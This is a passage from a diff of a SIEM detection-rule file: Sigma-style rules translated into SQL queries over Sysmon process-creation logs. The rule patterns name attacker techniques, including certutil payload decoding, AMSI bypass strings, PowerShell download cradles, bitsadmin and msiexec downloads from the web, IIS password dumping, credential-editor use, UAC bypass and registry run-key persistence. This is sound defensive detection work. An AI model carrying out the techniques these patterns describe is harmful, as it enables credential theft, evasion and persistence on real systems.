- "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_certutil_decode.yml" + }, + { + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", - "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "status": "experimental", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "status": "experimental", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": "d042284c-a296-4988-9be5-f424fadcc28c", - "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "author": "frack113", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "status": "experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", + "status": "test", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "status": "test", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' 